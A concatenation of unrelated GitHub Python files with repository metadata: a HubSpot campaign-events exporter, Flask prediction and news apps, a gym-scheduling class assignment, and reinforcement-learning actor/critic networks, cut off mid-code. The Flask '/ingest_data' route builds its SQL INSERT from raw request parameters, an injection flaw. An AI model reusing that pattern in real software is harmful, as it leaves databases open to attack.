elif e['type'] == 'SENT' and statusDict[email] not in ['CLICK', 'OPEN', 'DELIVERED', 'PROCESSED']:
statusDict[email] = e['type']
elif e['type'] == 'STATUSCHANGE' or e['type'] == 'DEFERRED':
statusDict[email] = e['type']
else:
# FIRST TYPE STATE IS THE FIRST RECEIVED
#print("- NOT in statusDict.keys, adding contact and setting to " + e['type'])
statusDict[email] = e['type']
def main():
apikey = input('What\'s is your API Key? ')
campaignId = input('What\'s the campaignId? ')
statusDict = {}
try:
print("- Downloading Events from Hubspot API for Campaign " + campaignId + " ...")
url = 'https://api.hubapi.com/email/public/v1/events?hapikey=' + apikey + '&campaignId=' + campaignId
#print( ">>> GET: " , url)
response = requests.get(url)
response.raise_for_status()
jsonResponse = response.json()
for e in jsonResponse['events']:
processEvent(e, statusDict)
hasMore = jsonResponse['hasMore']
while hasMore:
url = 'https://api.hubapi.com/email/public/v1/events?hapikey=' + apikey + '&campaignId=' + campaignId + '&offset=' + jsonResponse['offset']
#print( ">>> GET: " , url)
response = requests.get(url)
response.raise_for_status()
jsonResponse = response.json()
for e in jsonResponse['events']:
processEvent(e, statusDict)
#print("<<<< Response: ")
#print(jsonResponse)
hasMore = jsonResponse['hasMore']
print("")
print("- All events read from API. Saving CSV with each Contact email,status for this campaign")
print("")
file_object = open('contactsCampaign.csv', 'w')
for email in statusDict:
contact = getContact(email, apikey)
print (email + "," + contact['phone'] + "," + contact['name'] + "," + contact['lastname'] + "," + statusDict[email])
file_object.write(email + "," + contact['phone'] + "," + contact['name'] + "," + contact['lastname'] + "," + statusDict[email] + "\n")
file_object.close()
except HTTPError as http_err:
print(f'HTTP error occurred: {http_err}')
except Exception as err:
print(f'Other error occurred: {err}')
if __name__ == '__main__':
main()
| zlibert/plib-emailcampaign | main.py | main.py | py | 5,094 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.exceptions.HTTPError",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "requests.get"... |
35748710144 | from flask import Flask, request
import sqlite3
import pickle
import numpy as np
app = Flask(__name__)
app.config["Debug"] = True
@app.route("/", methods = ["GET"])
def entrada():
return("¡Bienvenido a la página web de Antonio!")
@app.route("/predict", methods=['GET'])
def prediction():
tv = request.args.get("tv", None)
radio = request.args.get("radio", None)
newspaper = request.args.get("newspaper", None)
with open("advertising_model", "rb") as f:
modelo = pickle.load(f)
prediccion = modelo.predict([[tv, radio, newspaper]])
return str(prediccion)
@app.route("/ingest_data", methods=['GET'])
def agregar():
tv = request.args.get("tv", None)
radio = request.args.get("radio", None)
newspaper = request.args.get("newspaper", None)
sales = request.args.get("sales", None)
connection = sqlite3.connect("Advertising.db")
cursor = connection.cursor()
cursor.execute(str("INSERT INTO Advertising(tv, radio, newspaper, sales) VALUES(" + tv + "," + radio + "," + newspaper + "," + sales + ")"))
num = str(len(cursor.execute("select * from advertising").fetchall()))
connection.commit()
connection.close()
return str("el número de registros de la base de datos ahora es: " + num)
@app.route("/retrain", methods=['GET'])
def reentrenar():
connection = sqlite3.connect("Advertising.db")
cursor = connection.cursor()
with open("advertising_model", "rb") as f:
modelo = pickle.load(f)
x = np.array(cursor.execute("select * from advertising").fetchall())[:, :-1]
y = np.array(cursor.execute("select * from advertising").fetchall())[:, 3]
modelo.fit(x,y)
connection.close()
return "El modelo ha sido reentrenado con los valores añadidos"
| Toni2Morales/EjerPyAnywhere | pagina.py | pagina.py | py | 1,757 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "flask.reque... |
23100209026 | """Contains example scripts presenting various activation functions characteristics."""
import os
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import numpy as np
import inspect
from typing import Dict, Type
import NaiveNeurals.MLP.activation_functions as functions_module
def plot_characteristics():
"""Plots various activation functions characteristics"""
functions: Dict[str, Type[functions_module.ActivationFunction]] = {}
for _, obj in inspect.getmembers(functions_module):
if obj == functions_module.ActivationFunction:
continue
if inspect.isclass(obj) and issubclass(obj, functions_module.ActivationFunction):
functions[obj.label] = obj
plot_marks = ['m-', 'k-', 'r--', 'b-', 'c-']
colors = ['magenta', 'black', 'red', 'blue', 'cyan']
f1 = plt.figure()
ax1 = f1.add_subplot(111)
legend_handlers = []
for fn_label, fn in functions.items():
if fn_label == 'lin':
x_vals = np.linspace(-1, 1, 21)
elif fn_label == 'softplus':
x_vals = np.linspace(-2, 2, 21)
else:
x_vals = np.linspace(-4, 4, 101)
plot_label = mpatches.Patch(color=colors.pop(), label=fn_label)
legend_handlers.append(plot_label)
ax1.plot(x_vals, fn.function(x_vals), plot_marks.pop())
plt.legend(handles=legend_handlers)
plt.savefig(os.path.abspath(os.path.dirname(__file__)) + '/../docs/graphs/activation_functions.png')
plt.show()
if __name__ == '__main__':
plot_characteristics()
| p-sto/NaiveNeurals | scripts/activation_functions_example.py | activation_functions_example.py | py | 1,562 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "NaiveNeurals.MLP.activation_functions.ActivationFunction",
"line_number": 16,
"usage_type": "attribute"
},
{
... |
36569687322 | import datetime
from flask import Flask, render_template, request, json
application = Flask("News")
def getNews():
resultStr = ''
with open("news.json", "r", encoding="UTF-8") as file:
newsList = file.read()
newsList = json.loads(newsList)
for news in newsList:
resultStr += '<div class="content">'
resultStr += f'<h2>{news["title"]}</h2>'
resultStr += f'<h5>{news["date"]}</h5>'
resultStr += f'<div>{news["text"]}</div>'
resultStr += '</div>'
file.close()
return resultStr
def addNews(title: str, text: str):
currentDate = datetime.datetime.today()
with open("news.json", "r", encoding="UTF-8") as file:
newsList = json.loads(file.read())
newsData = {"title": title, "date": currentDate, "text": text}
newsList.append(newsData)
with open("news.json", "w", encoding="UTF-8") as file2:
file2.write(json.dumps(newsList, indent=2))
file2.close()
file.close()
@application.route("/")
def start():
content = getNews()
return render_template("index.html", content=content)
@application.route("/editor")
def editor():
if request.method == "GET":
title = request.args.get("title")
text = request.args.get("text")
if title != None and text != None:
addNews(title, text)
return render_template("editor.html")
application.run(host="0.0.0.0", port=8081) | Gubochka/NG_2022_Kirill_Bezdolny | Lesson_5/task3/task3.py | task3.py | py | 1,475 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.json.loads",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask.json",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.today",
... |
2940036472 | from __future__ import annotations
from datetime import datetime
from typing import Any
from gym_utilities import in_week, create_offering_dict
# The additional pay per hour that instructors receive for each certificate they
# hold.
BONUS_RATE = 1.50
class WorkoutClass:
"""A workout class that can be offered at a gym.
=== Public Attributes ===
name: The name of the workout class.
=== Private Attributes ===
_required_certificates: The certificates that an instructor must hold to
teach this WorkoutClass.
"""
name: str
_required_certificates: list[str]
def __init__(self, name: str, required_certificates: list[str]) -> None:
"""Initialize a new WorkoutClass called <name> and with the
<required_certificates>.
>>> workout_class = WorkoutClass('Kickboxing', ['Strength Training'])
>>> workout_class.name
'Kickboxing'
"""
self.name = name
self._required_certificates = required_certificates[:]
def get_required_certificates(self) -> list[str]:
"""Return all the certificates required to teach this WorkoutClass.
>>> workout_class = WorkoutClass('Kickboxing', ['Strength Training'])
>>> needed = workout_class.get_required_certificates()
>>> needed
['Strength Training']
>>> needed.append('haha')
>>> try_again = workout_class.get_required_certificates()
>>> try_again
['Strength Training']
"""
# Make a copy of the list to avoid aliasing
return self._required_certificates[:]
def __eq__(self, other: Any) -> bool:
"""Return True iff this WorkoutClass is equal to <other>.
Two WorkoutClasses are considered equal if they have the same name and
the same required certificates.
>>> workout_class = WorkoutClass('Kickboxing', ['Strength Training'])
>>> workout_class2 = WorkoutClass('Kickboxing', ['Strength Training'])
>>> workout_class == workout_class2
True
>>> d = {1: 17}
>>> workout_class == d
False
"""
if not isinstance(other, WorkoutClass):
return False
return (self.name == other.name
and self._required_certificates == other._required_certificates)
class Instructor:
"""
An instructor at a Gym.
=== Public Attributes ===
name: The name of this instructor.
=== Private Attributes ===
_id: The id representing this instructor.
_qualifications: A list of qualifications this instructor holds.
"""
name: str
_id: int
_qualifications: list[str]
def __init__(self, _id: int, name: str) -> None:
"""
Initialize an Instructor with <name>, <id>,
and qualifications if the instructor
has any qualifications.
"""
self._id = _id
self.name = name
self._qualifications = []
def add_certificate(self, q: str) -> bool:
"""
Appends certificate <q> to self._qualifications.
"""
if q not in self._qualifications:
self._qualifications.append(q)
return True
return False
def get_id(self) -> int:
"""
Returns the Instructor's id.
"""
temp = self._id
return temp
def get_certificates(self) -> list[str]:
"""
Returns a copy of the Instructor's _qualifications.
"""
return self._qualifications[:]
class Gym:
"""A gym that hosts workout classes taught by instructors.
All offerings of workout classes start on the hour and are 1 hour long.
If a class starts at 7:00 pm, for example, we say that the class is "at"
the timepoint 7:00, or just at 7:00.
=== Public Attributes ===
name: The name of the gym.
=== Private Attributes ===
_instructors: The instructors who work at this Gym.
Each key is an instructor's ID and its value is the Instructor object
representing them.
_workouts: The workout classes that are taught at this Gym.
Each key is the name of a workout class and its value is the
WorkoutClass object representing it.
_room_capacities: The rooms and capacities in this Gym.
Each key is the name of a room and its value is the room's capacity,
that is, the number of people who can register for a class in the room.
_schedule: The schedule of classes offered at this gym.
Each key is a date and time and its value is a nested dictionary
describing all offerings that start then. In the nested dictionary,
each key is the name of a room that has an offering scheduled then,
and its value is a tuple describing the offering. The tuple elements
record, in order:
- the instructor teaching the class,
- the workout class itself, and
- a list of registered clients. Each client is represented in the
list by a unique string.
=== Representation Invariants ===
- All instructors in _schedule are in _instructors (the reverse is not
necessarily true).
- All workout classes in _schedule are in _workouts (the reverse is not
necessarily true).
- All rooms recorded in _schedule are also recorded in _room_capacities (the
reverse is not necessarily true).
- Two workout classes cannot be scheduled at the same time in the same room.
- No instructor is scheduled to teach two workout classes at the same time.
I.e., there does not exist timepoint t, and rooms r1 and r2 such that
_schedule[t][r1][0] == _schedule[t][r2][0]
- No client can take two workout classes at the same time.
I.e., there does not exist timepoint t, and rooms r1 and r2 such that
c in _schedule[t][r1][2] and c in _schedule[t][r2][2]
- If an instructor is scheduled to teach a workout class, they have the
necessary qualifications.
- If there are no offerings scheduled at date and time <d>, then <d>
does not occur as a key in _schedule.
- If there are no offerings scheduled at date and time <d> in room <r> then
<r> does not occur as a key in _schedule[d]
- Each list of registered clients for an offering is ordered with the most
recently registered client at the end of the list.
"""
name: str
_instructors: dict[int, Instructor]
_workouts: dict[str, WorkoutClass]
_room_capacities: dict[str, int]
_schedule: dict[datetime,
dict[str, tuple[Instructor, WorkoutClass, list[str]]]]
def __init__(self, gym_name: str) -> None:
"""Initialize a new Gym with <name>. Initially, this gym has no
instructors, workout classes, rooms, or offerings.
>>> ac = Gym('Athletic Centre')
>>> ac.name
'Athletic Centre'
"""
self.name = gym_name
self._instructors = {}
self._workouts = {}
self._room_capacities = {}
self._schedule = {}
def add_instructor(self, instructor: Instructor) -> bool:
"""Add a new <instructor> to this Gym's roster iff the <instructor> does
not have the same id as another instructor at this Gym.
Return True iff the id has not already been added to this Gym's roster.
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> ac.add_instructor(diane)
True
"""
for _id in self._instructors:
if instructor.get_id() == _id:
return False
self._instructors[instructor.get_id()] = instructor
return True
def add_workout_class(self, workout_class: WorkoutClass) -> bool:
"""Add a <workout_class> to this Gym iff the <workout_class> does not
have the same name as another WorkoutClass at this Gym.
Return True iff the workout class has not already been added this Gym.
>>> ac = Gym('Athletic Centre')
>>> kickboxing = WorkoutClass('Kickboxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
"""
for workout_name in self._workouts:
if workout_class.name == workout_name:
return False
self._workouts[workout_class.name] = workout_class
return True
def add_room(self, name: str, capacity: int) -> bool:
"""Add a room with <name> and <capacity> to this Gym iff there is not
already a room with <name> at this Gym.
Return True iff the room has not already been added to this Gym.
>>> ac = Gym('Athletic Centre')
>>> ac.add_room('Dance Studio', 50)
True
"""
for room_name in self._room_capacities:
if name == room_name:
return False
self._room_capacities[name] = capacity
return True
def schedule_workout_class(self, time_point: datetime, room_name: str,
workout_name: str, instr_id: int) -> bool:
"""Add an offering to this Gym at <time_point> iff: the room with
<room_name> is available, the instructor with <instr_id> is qualified
to teach the workout class with <workout_name>, and the instructor is
not teaching another workout class at the same <time_point>.
A room is available iff it does not already have another workout class
scheduled at that day and time.
The added offering starts with no registered clients.
Return True iff the offering was added.
Preconditions:
- The room has already been added to this Gym.
- The Instructor has already been added to this Gym.
- The WorkoutClass has already been added to this Gym.
>>> ac = Gym('Athletic Centre')
>>> jacqueline = Instructor(1, 'Jacqueline Smith')
>>> ac.add_instructor(jacqueline)
True
>>> jacqueline.add_certificate('Cardio 1')
True
>>> diane = Instructor(2, 'Diane Horton')
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 18)
True
>>> ac.add_room('lower gym', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> tap = WorkoutClass('Intro Tap', [])
>>> ac.add_workout_class(tap)
True
>>> sep_9_2022_12_00 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'lower gym',\
boot_camp.name, jacqueline.get_id())
True
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'Dance Studio',\
tap.name, diane.get_id())
True
"""
if time_point in self._schedule:
for _class in self._schedule[time_point]:
if self._schedule[time_point][_class][0].get_id() == instr_id:
return False
for q in self._workouts[workout_name].get_required_certificates():
if q not in self._instructors[instr_id].get_certificates():
return False
if time_point in self._schedule:
for room in self._schedule[time_point]:
if room_name == room:
return False
if self._schedule.get(time_point) is None:
self._schedule[time_point] \
= {room_name: (self._instructors[instr_id],
self._workouts[workout_name],
[])}
return True
self._schedule[time_point][room_name] \
= (self._instructors[instr_id], self._workouts[workout_name], [])
return True
def register(self, time_point: datetime, client: str, workout_name: str) \
-> bool:
"""Add <client> to the WorkoutClass with <workout_name> that is being
offered at <time_point> iff the client has not already been registered
in any course (including <workout_name>) at <time_point>, and the room
is not full.
If the WorkoutClass is being offered in more than one room at
<time_point>, then add the client to the room that has the most clients
already registered but still has available space. In the case of a tie,
register <client> in any of the tied classes.
Return True iff the client was added.
Precondition: the WorkoutClass with <workout_name> is being offered in
at least one room at <time_point>.
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> sep_9_2022_12_00 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'Dance Studio',\
boot_camp.name, diane.get_id())
True
>>> ac.register(sep_9_2022_12_00, 'Philip', 'Boot Camp')
True
>>> ac.register(sep_9_2022_12_00, 'Philip', 'Boot Camp')
False
"""
if time_point not in self._schedule:
return False
for _class in self._schedule[time_point]:
if client in self._schedule[time_point][_class][2]:
return False
listy = []
for room_name in self._schedule[time_point]:
if self._schedule[time_point][room_name][1].name == workout_name:
listy.append((self._room_capacities[room_name]
- len(self._schedule[time_point][room_name][2]),
room_name))
listy.sort()
listy.reverse()
for item in listy:
if item[0] != 0:
self._schedule[time_point][item[1]][2].append(client)
return True
return False
def instructor_hours(self, time1: datetime, time2: datetime) -> \
dict[int, int]:
"""Return a dictionary reporting the hours worked by instructors
teaching classes that start at any time between <time1> and <time2>,
inclusive.
Each key is an instructor ID and its value is the total number of hours
worked by that instructor between <time1> and <time2>. Both <time1> and
<time2> specify the start time for an hour when an instructor may have
taught.
Precondition: time1 <= time2
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> david = Instructor(2, 'David')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(diane)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> t1 = datetime(2019, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name, 1)
True
>>> t2 = datetime(2019, 9, 10, 12, 0)
>>> ac.instructor_hours(t1, t2) == {1: 1, 2: 0}
True
>>> ac.schedule_workout_class(t2, 'Dance Studio', boot_camp.name, 1)
True
>>> ac.instructor_hours(t1, t2) == {1: 2, 2: 0}
True
"""
hours_dict = {}
for _id in self._instructors:
hours_dict[self._instructors[_id].get_id()] = 0
if not self._schedule:
return hours_dict
for time in self._schedule:
if time1 <= time <= time2:
for room_name in self._schedule[time]:
ins_id = self._schedule[time][room_name][0].get_id()
hours_dict[ins_id] += 1
return hours_dict
def payroll(self, time1: datetime, time2: datetime, base_rate: float) \
-> list[tuple[int, str, int, float]]:
"""Return a sorted list of tuples reporting pay earned by each
instructor teaching classes that start any time between <time1> and
<time2>, inclusive. The list should be sorted in ascending order of
instructor ids.
Each tuple contains 4 elements, in this order:
- an instructor's ID,
- the instructor's name,
- the number of hours worked by the instructor between <time1> and
<time2>, and
- the instructor's total wages earned between <time1> and <time2>.
The returned list is sorted by instructor ID.
Both <time1> and <time2> specify the start time for an hour when an
instructor may have taught.
Each instructor earns a <base_rate> per hour plus an additional
BONUS_RATE per hour for each certificate they hold.
Precondition: time1 <= time2
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> david = Instructor(2, 'David')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(david)
True
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> t1 = datetime(2019, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name,
... 1)
True
>>> t2 = datetime(2019, 9, 10, 12, 0)
>>> ac.payroll(t1, t2, 25.0)
[(1, 'Diane', 1, 26.5), (2, 'David', 0, 0.0)]
"""
payroll_list = []
if not self._schedule:
return payroll_list
for time in self._schedule:
if time1 <= time <= time2:
for room_name in self._schedule[time]:
ins_id = self._schedule[time][room_name][0].get_id()
hrs = self.instructor_hours(time1, time2)[ins_id]
ins_name = self._schedule[time][room_name][0].name
ins = self._instructors[ins_id]
payroll_list.append((ins_id,
ins_name,
hrs,
(base_rate + len(
ins.get_certificates())
* BONUS_RATE)
* hrs
))
for _id in self._instructors:
temp = True
for item in payroll_list:
if item[0] == _id:
temp = False
if temp:
payroll_list.append((_id, self._instructors[_id].name, 0, 0.0))
payroll_list.sort()
return payroll_list
def _is_instructor_name_unique(self, instructor: Instructor) -> bool:
"""Return True iff the name of <instructor> is used by <= 1 instructor
in the Gym.
>>> ac = Gym('Athletic Centre')
>>> first_hire = Instructor(1, 'Diane')
>>> ac.add_instructor(first_hire)
True
>>> ac._is_instructor_name_unique(first_hire)
True
>>> second_hire = Instructor(2, 'Diane')
>>> ac.add_instructor(second_hire)
True
>>> ac._is_instructor_name_unique(first_hire)
False
>>> ac._is_instructor_name_unique(second_hire)
False
>>> third_hire = Instructor(3, 'Tom')
>>> ac._is_instructor_name_unique(third_hire)
True
"""
count = 0
for _id in self._instructors:
if self._instructors[_id].name == instructor.name:
count += 1
if count <= 1:
return True
return False
def offerings_at(self, time_point: datetime) -> list[dict[str, str | int]]:
"""Return a list of dictionaries, each representing a workout offered
at this Gym at <time_point>.
The offerings should be sorted by room name, in alphabetical ascending
order.
Each dictionary must have the following keys and values:
'Date': the weekday and date of the class as a string, in the format
'Weekday, year-month-day' (e.g., 'Monday, 2022-11-07')
'Time': the time of the class, in the format 'HH:MM' where
HH uses 24-hour time (e.g., '15:00')
'Class': the name of the class
'Room': the name of the room
'Registered': the number of people already registered for the class
'Available': the number of spots still available in the class
'Instructor': the name of the instructor
If there are multiple instructors with the same name, the name
should be followed by the instructor ID in parentheses
e.g., "Diane (1)"
If there are no offerings at <time_point>, return an empty list.
NOTE:
- You MUST use the helper function create_offering_dict from
gym_utilities to create the dictionaries, in order to make sure you
match the format specified above.
- You MUST use the helper method _is_instructor_name_unique when
deciding how to format the instructor name.
>>> ac = Gym('Athletic Centre')
>>> diane1 = Instructor(1, 'Diane')
>>> diane1.add_certificate('Cardio 1')
True
>>> diane2 = Instructor(2, 'Diane')
>>> david = Instructor(3, 'David')
>>> david.add_certificate('Strength Training')
True
>>> ac.add_instructor(diane1)
True
>>> ac.add_instructor(diane2)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> ac.add_room('Room A', 20)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> kickboxing = WorkoutClass('KickBoxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
>>> t1 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name, 1)
True
>>> ac.schedule_workout_class(t1, 'Room A', kickboxing.name, 3)
True
>>> ac.offerings_at(t1) == [
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'Boot Camp', 'Room': 'Dance Studio', 'Registered': 0,
... 'Available': 50, 'Instructor': 'Diane (1)' },
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'KickBoxing', 'Room': 'Room A', 'Registered': 0,
... 'Available': 20, 'Instructor': 'David' }
... ]
True
"""
listy = []
if not self._schedule[time_point]:
return []
for room_name in self._schedule[time_point]:
temp = self._schedule[time_point][room_name][0]
if self._is_instructor_name_unique(temp):
ins_name = self._schedule[time_point][room_name][0].name
else:
ins_name = self._schedule[time_point][room_name][0].name + \
f" ({self._schedule[time_point][room_name][0].get_id()})"
listy.append(
create_offering_dict(
time_point.strftime('%A, %Y-%m-%d'),
time_point.strftime('%H:%M'),
self._schedule[time_point][room_name][1].name,
room_name,
len(self._schedule[time_point][room_name][2]),
self._room_capacities[room_name]
- len(self._schedule[time_point][room_name][2]),
ins_name
)
)
listy.sort(key=lambda x: x['Room'])
return listy
def to_schedule_list(self, week: datetime = None) \
-> list[dict[str, str | int]]:
"""Return a list of dictionaries for the Gym's entire schedule, with
each dictionary representing a workout offered (in the format specified
by the docstring for offerings_at).
The dictionaries should be in the list in ascending order by their date
and time (not the string representation of the date and time).
Offerings occurring at exactly the same date and time should
be in alphabetical order based on their room names.
If <week> is specified, only return the events that occur between the
date interval (between a Monday 0:00 and Sunday 23:59) that contains
<week>.
Hint: The helper function <in_week> can be used to determine if one
datetime object is in the same week as another.
>>> ac = Gym('Athletic Centre')
>>> diane1 = Instructor(1, 'Diane')
>>> diane1.add_certificate('Cardio 1')
True
>>> diane2 = Instructor(2, 'Diane')
>>> david = Instructor(3, 'David')
>>> david.add_certificate('Strength Training')
True
>>> ac.add_instructor(diane1)
True
>>> ac.add_instructor(diane2)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Studio 1', 20)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> kickboxing = WorkoutClass('KickBoxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
>>> t1 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Studio 1', boot_camp.name, 1)
True
>>> t2 = datetime(2022, 9, 8, 13, 0)
>>> ac.schedule_workout_class(t2, 'Studio 1', kickboxing.name, 3)
True
>>> ac.to_schedule_list() == [
... { 'Date': 'Thursday, 2022-09-08', 'Time': '13:00',
... 'Class': 'KickBoxing', 'Room': 'Studio 1', 'Registered': 0,
... 'Available': 20, 'Instructor': 'David' },
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'Boot Camp', 'Room': 'Studio 1', 'Registered': 0,
... 'Available': 20, 'Instructor': 'Diane (1)' },
... ]
True
"""
listy = []
if not self._schedule:
return listy
schedule_keys = list(self._schedule.keys())
schedule_keys.sort(reverse=False)
if week:
for time in schedule_keys:
if in_week(time, week):
listy = self.__add_o(listy, time)
else:
for time in schedule_keys:
listy = self.__add_o(listy, time)
return listy
def __add_o(self, listy: list[dict[str, str | int]], t: datetime) \
-> list[dict[str, str | int]]:
"""
Helper function for to_schedule_list, appends all offerings at
<time> to <listy>.
"""
if len(self.offerings_at(t)) == 1:
listy.append(self.offerings_at(t)[0])
return listy
for item in self.offerings_at(t):
listy.append(item)
return listy
def __eq__(self, other: Gym) -> bool:
"""Return True iff this Gym is equal to <other>.
Two gyms are considered equal if they have the same name,
instructors, workouts, room capacities, and schedule.
>>> ac = Gym('Athletic Centre')
>>> ac2 = Gym('Athletic Centre')
>>> ac == ac2
True
"""
return self.name == other.name \
and self._instructors == other._instructors \
and self._workouts == other._workouts \
and self._room_capacities == other._room_capacities \
and self._schedule == other._schedule
def to_webpage(self) -> None:
"""
Deleted this method because I was having an error with pandas on
my computer. It said I had no module _bz2, I tried to install
using the command line and pip, and also tried to build
python again, but it didn't work, so I removed the method entirely,
along with any other methods that called pandas. The method header
is still here because there is a test on MarkUs that checks if it is.
"""
if __name__ == '__main__':
pass
| Heian0/148 | 148/assignments/a0/a0/gym.py | gym.py | py | 28,439 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Any",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 178,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 248,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
... |
25444280568 | import torch
import torch.nn as nn
import torch.optim as optim
import os
from omegaconf import OmegaConf, DictConfig
def save_model(model, path=None):
if path:
new_path = os.path.join(model.save_path,path)
model_file_path = os.path.join(
new_path,
model.name)
else:
new_path = model.save_path
model_file_path = os.path.join(model.save_path, model.name)
if not os.path.exists(new_path):
os.makedirs(new_path)
torch.save(model.get_weights(), model_file_path)
def load_model(model, save_path, checkpoint):
model_file_path = os.path.join(save_path,checkpoint, model.name)
model.load_state_dict(torch.load(model_file_path))
class Actor(nn.Module):
'''
Actor network for DDPG
'''
def __init__(self, config: DictConfig, target=False, worker=False):
super().__init__()
self.config = config
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
if self.config.running_on == 'M1':
self.device = 'mps' if torch.backends.mps.is_available() else 'cpu'
if worker:
self.device = 'cpu'
self.name = 'actor'
if target:
self.name = 'target_actor'
self.save_path = config.agent.save_path
self.learning_rate = config.agent.actor_lr
self.state_dimension = config.env.state_dimension
self.action_dimension = config.env.action_dimension
self.linear_block = nn.Sequential(
nn.Linear(self.state_dimension, 400),
#nn.BatchNorm1d(400),
nn.LayerNorm(400),
nn.ReLU(),
nn.Linear(400, 300),
#nn.BatchNorm1d(300),
nn.LayerNorm(300),
nn.ReLU(),
nn.Linear(300, self.action_dimension),
nn.Tanh()
)
self.optimizer = optim.Adam(
self.parameters(), lr=self.learning_rate
)
self.to(self.device)
def forward(self, x):
x = self.linear_block(x)
return x
def get_weights(self):
return {k: v.cpu() for k,v in self.state_dict().items()}
def set_weights(self, weights):
self.load_state_dict(weights)
def save_model(self, path=None):
save_model(self, path)
def load_model(self, path, checkpoint):
load_model(self, path, checkpoint)
class Critic(nn.Module):
'''
Critic network for DDPG
'''
def __init__(self, config: DictConfig, target=False, worker=False):
super().__init__()
self.config = config
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
if self.config.running_on == 'M1':
self.device = 'mps' if torch.backends.mps.is_available() else 'cpu'
if worker:
self.device = 'cpu'
self.name = 'critic'
if target:
self.name = 'target_critic'
self.save_path = config.agent.save_path
self.learning_rate = config.agent.critic_lr
self.state_dimension = config.env.state_dimension
self.action_dimension = config.env.action_dimension
self.batch_size = self.config.memory.batch_size
self.linear_block = nn.Sequential(
nn.Linear(self.state_dimension + self.action_dimension, 400),
#nn.BatchNorm1d(400),
nn.LayerNorm(400),
nn.ReLU(),
nn.Linear(400, 300),
#nn.BatchNorm1d(300),
nn.LayerNorm(300),
nn.ReLU(),
nn.Linear(300, 1),
)
self.optimizer = optim.Adam(
self.parameters(), lr=self.learning_rate
)
self.to(self.device)
def forward(self, x,y):
if not(len(x.shape) == 1):
q = self.linear_block(torch.cat([x,y],1))
return q
else:
q = self.linear_block(torch.cat([x,y],0))
return q
def get_weights(self):
return {k: v.cpu() for k,v in self.state_dict().items()}
def set_weights(self, weights):
self.load_state_dict(weights)
def save_model(self,path=None):
save_model(self, path)
def load_model(self, path, checkpoint):
load_model(self, path, checkpoint)
# Adapted from:
# https://github.com/PacktPublishing/Deep-Reinforcement-Learning-Hands-On-Second-Edition/blob/master/Chapter17/lib/model.py
class D4PGCritic(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.obs_size = self.config.env.state_dimension
self.act_size = self.config.env.action_dimension
self.n_atoms = self.config.agent.n_atoms
self.v_min = self.config.agent.v_min
self.v_max = self.config.agent.v_max
self.obs_net = nn.Sequential(
nn.Linear(self.obs_size, 400),
nn.ReLU(),
)
self.out_net = nn.Sequential(
